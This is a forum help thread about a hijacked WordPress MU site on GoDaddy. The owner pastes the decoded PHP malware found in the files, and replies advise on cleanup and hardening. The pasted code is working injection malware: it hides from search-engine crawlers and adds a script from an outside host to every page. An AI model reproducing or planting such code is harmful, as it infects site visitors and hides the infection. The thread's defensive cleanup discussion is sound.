WordPress MU

Looking for some help figuring out first how to clean up a hijacked MU site and second what to do to prevent this from happening again. Basically any visits to the front end or back end of the site redirect to a virus site. After a bit of research and peeping at some of the PHP files in the install shows a bunch of base64 code at the top of all files. Run through a decoder I get this:

'if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9ob2xhc2lvbndlYi5jb20vb28ucGhwIj48L3NjcmlwdD4="); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }'

As a temporary stopgap, I put up an index.html page and renamed index.php to index1.php, so at least visitors aren't being sent to the bad site. With this done, I'm now trying to figure out next steps. Any help greatly appreciated.

change all your server passwords, upload a new version of the WPMU core files and your plugs and themes. Makes sure file permissions are set that only the folder used for file uploads and for caching (if you have it) are writable by the webserver user. All other files should be read only for the webserver user

Are you perchance hosted at GoDaddy? because this is the third time that host has been hit by this same hack.

I will note strongly here that it does not affect just Wordpress or mu sites, but ANY php-based site.

Yes, it is a GoDaddy site.

What about the database? We have nightly DB and FTP backups being made, so I'm hoping we can roll the db back, reinstall MU, plugins, theme and be done with this. Any thoughts on whether this stuff is getting into databases or how to ferret it out?

It's not getting in to the database itself. It's just getting in to the server and editing files, and some of us feel it's via ftp vulnerabilities, though I will say this attack has mostly been on larger shared hosts so far. And for GoDaddy in particular, the THIRD time this month.

Use Sftp if you can. ftp is actually pretty easy to crack.

also, it's my understanding that goDaddy has a "restore" feature, but you'd have to make sure you rolled back to before the hack. And you may lose posts in between. Check your backups.

Generally speaking, removing all the old files and replacing with fresh should clean it up.

More: http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html